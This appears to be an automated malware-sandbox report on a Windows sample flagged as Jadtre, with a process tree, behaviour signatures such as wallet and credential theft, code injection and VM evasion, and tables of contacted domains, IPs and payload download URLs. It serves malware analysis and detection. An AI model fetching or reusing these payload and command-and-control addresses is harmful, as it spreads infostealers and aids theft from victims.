18->81 dropped 83 C:\Users\user\AppData\Local\Temp\B552.exe, PE32+ 18->83 dropped 91 2 other malicious files 18->91 dropped 141 System process connects to network (likely due to code injection or exploit) 18->141 143 Benign windows process drops PE files 18->143 145 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 18->145 153 5 other signatures 18->153 27 753F.exe 18->27         started        32 B552.exe 18->32         started        34 F6D9.exe 18->34         started        40 2 other processes 18->40 115 ddos.dnsnb8.net 44.221.84.105, 49703, 49711, 49712 AMAZON-AESUS United States 23->115 85 C:\Program Files\7-Zip\Uninstall.exe, PE32 23->85 dropped 87 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 23->87 dropped 89 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 23->89 dropped 147 Antivirus detection for dropped file 23->147 149 Multi AV Scanner detection for dropped file 23->149 151 Detected unpacking (changes PE section rights) 23->151 155 2 other signatures 23->155 36 WerFault.exe 19 16 23->36         started        38 cmd.exe 25->38         started        file9 signatures10 process11 dnsIp12 129 rentry.co 104.26.3.16, 443, 49759 CLOUDFLARENETUS United States 27->129 103 C:\Users\user\AppData\...\rentry-script.ps1, ASCII 27->103 dropped 195 Suspicious powershell command line found 27->195 197 Found many strings related to Crypto-Wallets (likely being stolen) 27->197 199 Bypasses PowerShell execution policy 27->199 217 3 other signatures 27->217 42 powershell.exe 27->42         started        47 753F.exe 27->47         started        201 Multi AV Scanner detection for dropped file 32->201 203 Writes to foreign memory regions 32->203 205 Allocates memory in foreign processes 32->205 219 2 other signatures 32->219 49 BitLockerToGo.exe 32->49         started        207 Check for Windows Defender sandbox 34->207 209 Machine Learning detection for dropped file 34->209 211 Changes memory attributes in foreign processes to executable or writable 34->211 213 Injects code into the Windows Explorer (explorer.exe) 34->213 51 conhost.exe 34->51         started        53 conhost.exe 38->53         started        215 Windows Scripting host queries suspicious COM object (likely to drop second stage) 40->215 55 cmd.exe 40->55         started        57 conhost.exe 40->57         started        file13 signatures14 process15 dnsIp16 125 store4.gofile.io 31.14.70.245, 443, 49763, 49770 LINKER-ASFR Virgin Islands (BRITISH) 42->125 93 C:\Users\user\AppData\Local\Temp\...\vm.exe, PE32 42->93 dropped 95 C:\Users\user\AppData\Local\Temp\...\g2m.dll, PE32 42->95 dropped 97 C:\Users\user\AppData\Local\Temp\...\lm.exe, PE32 42->97 dropped 99 3 other malicious files 42->99 dropped 167 Drops VBS files to the startup folder 42->167 169 Loading BitLocker PowerShell Module 42->169 171 Powershell drops PE file 42->171 59 cmd.exe 42->59         started        61 cmd.exe 42->61         started        63 conhost.exe 42->63         started        127 callosallsaospz.shop 188.114.96.3, 443, 49754, 49756 CLOUDFLARENETUS European Union 49->127 173 Query firmware table information (likely to detect VMs) 49->173 175 Found many strings related to Crypto-Wallets (likely being stolen) 49->175 177 Tries to harvest and steal ftp login credentials 49->177 179 Tries to steal Crypto Currency Wallets 49->179 65 vm.exe 55->65         started        67 conhost.exe 55->67         started        file17 signatures18 process19 process20 69 lm.exe 59->69         started        73 vm.exe 61->73         started        75 WerFault.exe 65->75         started        dnsIp21 119 liernessfornicsa.shop 172.67.213.85, 443, 49780, 49782 CLOUDFLARENETUS United States 69->119 157 Query firmware table information (likely to detect VMs) 69->157 159 Tries to harvest and steal browser information (history, passwords, etc) 69->159 161 Tries to steal Crypto Currency Wallets 69->161 77 WerFault.exe 69->77         started        121 193.222.96.24, 4449, 49784, 49807 SWISSCOMSwisscomSwitzerlandLtdCH Germany 73->121 123 94.156.79.190, 4449, 49821 NET1-ASBG Bulgaria 73->123 163 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 73->163 165 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 73->165 signatures22 process23

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  7Y18r(14).exe95%ReversingLabsWin32.Virus.Jadtre
                  7Y18r(14).exe100%AviraW32/Jadtre.B
                  7Y18r(14).exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
                  C:\Users\user\AppData\Local\Temp\IXDaI.exe100%AviraTR/Dldr.Small.Z.haljq
                  C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\IXDaI.exe100%Joe Sandbox ML
                  C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\F6D9.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\B552.exe50%ReversingLabsWin32.Trojan.Generic
                  C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\F6D9.exe16%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\IXDaI.exe92%ReversingLabsWin32.Trojan.Madeba
                  C:\Users\user\AppData\Roaming\ftejced95%ReversingLabsWin32.Virus.Jadtre
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  http://ddos.dnsnb8.net:799/cj//k1.rar100%URL Reputationmalware
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                  http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                  https://android.notify.windows.com/iOS0%URL Reputationsafe
                  http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                  https://api.msn.com/v1/news/Feed/Windows?0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  http://ocsps.ssl.com00%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  http://schemas.micro0%URL Reputationsafe
                  https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-0%Avira URL Cloudsafe
                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                  https://wns.windows.com/bat0%Avira URL Cloudsafe
                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                  http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt00%Avira URL Cloudsafe
                  http://ddos.dnsnb8.net:799/cj//k3.rar100%Avira URL Cloudphishing
                  http://www.activestate.comHolger0%Avira URL Cloudsafe
                  http://gebeus.ru/tmp/index.php100%Avira URL Cloudmalware
                  https://liernessfornicsa.shop/80%Avira URL Cloudsafe
                  http://ocsps.ssl.com0?0%Avira URL Cloudsafe
                  https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-0%Avira URL Cloudsafe
                  http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl00%Avira URL Cloudsafe
                  https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip0%Avira URL Cloudsafe
                  https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-w0%Avira URL Cloudsafe
                  callosallsaospz.shop0%Avira URL Cloudsafe
                  https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg0%Avira URL Cloudsafe
                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppin0%Avira URL Cloudsafe
                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=16964972674007000%Avira URL Cloudsafe
                  http://ocsps.ssl.com0_0%Avira URL Cloudsafe
                  http://cx5519.com/tmp/index.php100%Avira URL Cloudmalware
                  http://www.spaceblue.com0%Avira URL Cloudsafe
                  https://callosallsaospz.shop/api10%Avira URL Cloudsafe
                  http://www.develop.comDeepak0%Avira URL Cloudsafe
                  https://rentry.co0%Avira URL Cloudsafe
                  https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi0%Avira URL Cloudsafe
                  http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta0%Avira URL Cloudsafe
                  http://evilos.cc/tmp/index.php100%Avira URL Cloudmalware
                  http://www.oberhumer.com0%Avira URL Cloudsafe
                  liernessfornicsa.shop0%Avira URL Cloudsafe
                  https://aka.ms/winsvr-2022-pshelp0%Avira URL Cloudsafe
                  https://107.173.160.139/0%Avira URL Cloudsafe
                  https://store4.gofile.io0%Avira URL Cloudsafe
                  http://www.activestate.com0%Avira URL Cloudsafe
                  https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years0%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                  http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark0%Avira URL Cloudsafe
                  shepherdlyopzc.shop0%Avira URL Cloudsafe
                  http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer00%Avira URL Cloudsafe
                  https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&oc0%Avira URL Cloudsafe
                  https://liernessfornicsa.shop/fD0%Avira URL Cloudsafe
                  http://ddos.dnsnb8.net:799/cj//k5.rar100%Avira URL Cloudphishing
                  https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip0%Avira URL Cloudsafe
                  https://github.com/Pester/Pester0%Avira URL Cloudsafe
                  http://www.spaceblue.comMathias0%Avira URL Cloudsafe
                  https://word.office.com5760%Avira URL Cloudsafe
                  upknittsoappz.shop0%Avira URL Cloudsafe
                  https://mussangroup.com/wp-content/images/pic1.jpg100%Avira URL Cloudmalware
                  http://www.lua.org0%Avira URL Cloudsafe
                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg0%Avira URL Cloudsafe
                  unseaffarignsk.shop0%Avira URL Cloudsafe
                  http://ddos.dnsnb8.net:799/cj//k3.rar6100%Avira URL Cloudphishing
                  http://html4/loose.dtd0%Avira URL Cloudsafe
                  https://api.msn.com/$0%Avira URL Cloudsafe
                  https://callosallsaospz.shop/0%Avira URL Cloudsafe
                  https://liernessfornicsa.shop/g0%Avira URL Cloudsafe
                  https://callosallsaospz.shop/api100%Avira URL Cloudmalware
                  http://ddos.dnsnb8.net:799/cj//k3.rarB100%Avira URL Cloudmalware
                  https://liernessfornicsa.shop/_0%Avira URL Cloudsafe
                  http://www.scintilla.org/scite.rng0%Avira URL Cloudsafe
                  https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr0%Avira URL Cloudsafe
                  https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvW0%Avira URL Cloudsafe
                  http://ddos.dnsnb8.net:799/cj//k4.rarO100%Avira URL Cloudphishing
                  http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q0%Avira URL Cloudsafe
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT0%Avira URL Cloudsafe
                  https://107.173.160.137/0%Avira URL Cloudsafe
                  https://liernessfornicsa.shop/api(0%Avira URL Cloudsafe
                  http://store4.gofile.io0%Avira URL Cloudsafe
                  https://rentry.co/microgods/raw0%Avira URL Cloudsafe
                  http://ddos.dnsnb8.net:799/cj//k2.rar100%Avira URL Cloudphishing
                  lariatedzugspd.shop0%Avira URL Cloudsafe
                  http://www.baanboard.comBrendon0%Avira URL Cloudsafe
                  https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b0%Avira URL Cloudsafe
                  http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl00%Avira URL Cloudsafe
                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg0%Avira URL Cloudsafe
                  https://www.smartsharesystems.com/0%Avira URL Cloudsafe
                  http://www.scintilla.org0%Avira URL Cloudsafe
                  http://.css0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  funrecipebooks.com
                  162.0.235.84
                  truetrue
                    unknown
                    bg.microsoft.map.fastly.net
                    199.232.214.172
                    truefalse
                      unknown
                      store4.gofile.io
                      31.14.70.245
                      truefalse
                        unknown
                        evilos.cc
                        127.0.0.127
                        truetrue
                          unknown
                          gebeus.ru
                          189.165.133.52
                          truetrue
                            unknown
                            ddos.dnsnb8.net
                            44.221.84.105
                            truefalse
                              unknown
                              rentry.co
                              104.26.3.16
                              truetrue
                                unknown
                                liernessfornicsa.shop
                                172.67.213.85
                                truetrue
                                  unknown
                                  mussangroup.com
                                  185.149.100.242
                                  truetrue
                                    unknown
                                    callosallsaospz.shop
                                    188.114.96.3
                                    truetrue
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      http://ddos.dnsnb8.net:799/cj//k3.rarfalse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      http://gebeus.ru/tmp/index.phptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zipfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      callosallsaospz.shoptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://cx5519.com/tmp/index.phptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://ddos.dnsnb8.net:799/cj//k1.rartrue
                                      • URL Reputation: malware
                                      unknown
                                      liernessfornicsa.shoptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://evilos.cc/tmp/index.phptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://107.173.160.139/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      shepherdlyopzc.shoptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      upknittsoappz.shoptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://mussangroup.com/wp-content/images/pic1.jpgtrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://ddos.dnsnb8.net:799/cj//k5.rarfalse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zipfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      unseaffarignsk.shoptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://callosallsaospz.shop/apifalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://107.173.160.137/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://rentry.co/microgods/rawfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://ddos.dnsnb8.net:799/cj//k2.rarfalse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      lariatedzugspd.shoptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://wns.windows.com/batexplorer.exe, 0000000E.00000000.1447862980.0000000009730000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.activestate.comHolgerSciTE.exe.5.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000E.00000000.1444506660.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://ocsps.ssl.com0?753F.exe.14.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0753F.exe.14.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://liernessfornicsa.shop/8lm.exe, 00000026.00000002.2895669741.0000000003127000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0753F.exe.14.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppinexplorer.exe, 0000000E.00000000.1449509463.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpgBitLockerToGo.exe, 0000001F.00000003.2408861121.0000000005441000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700BitLockerToGo.exe, 0000001F.00000003.2408861121.0000000005441000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-wexplorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://nuget.org/nuget.exepowershell.exe, 00000020.00000002.2668792904.0000020A779CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://ocsps.ssl.com0_753F.exe.14.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.spaceblue.comSciTE.exe.5.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://callosallsaospz.shop/api1BitLockerToGo.exe, 0000001F.00000002.2490089240.0000000002FEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FEF000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&ctalm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.develop.comDeepakSciTE.exe.5.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name753F.exe, 0000001C.00000002.2708165528.000001C080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A67961000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002D49000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://rentry.co753F.exe, 0000001C.00000002.2708165528.000001C080396000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.oberhumer.comF6D9.exefalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000020.00000002.2624078104.0000020A67D90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A68B86000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000020.00000002.2624078104.0000020A67D90000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://store4.gofile.iopowershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A690D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-yearsexplorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.activestate.comSciTE.exe.5.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://contoso.com/Iconpowershell.exe, 00000020.00000002.2668792904.0000020A779CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEIXDaI.exe, 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmp, IXDaI.exe, 00000005.00000003.1268611401.0000000001120000.00000004.00001000.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000003.1624080996.0000000001290000.00000004.00001000.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0753F.exe.14.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&ocexplorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.ecosia.org/newtab/BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://liernessfornicsa.shop/fDlm.exe, 00000026.00000002.2895669741.0000000003127000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brlm.exe, 00000026.00000003.2693429073.000000000357C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://word.office.com576explorer.exe, 0000000E.00000000.1449509463.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://github.com/Pester/Pesterpowershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.spaceblue.comMathiasSciTE.exe.5.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.lua.orgSciTE.exe.5.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://android.notify.windows.com/iOSexplorer.exe, 0000000E.00000000.1449509463.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000020.00000002.2624078104.0000020A67D90000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://liernessfornicsa.shop/_lm.exe, 00000026.00000003.2640613432.000000000067D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
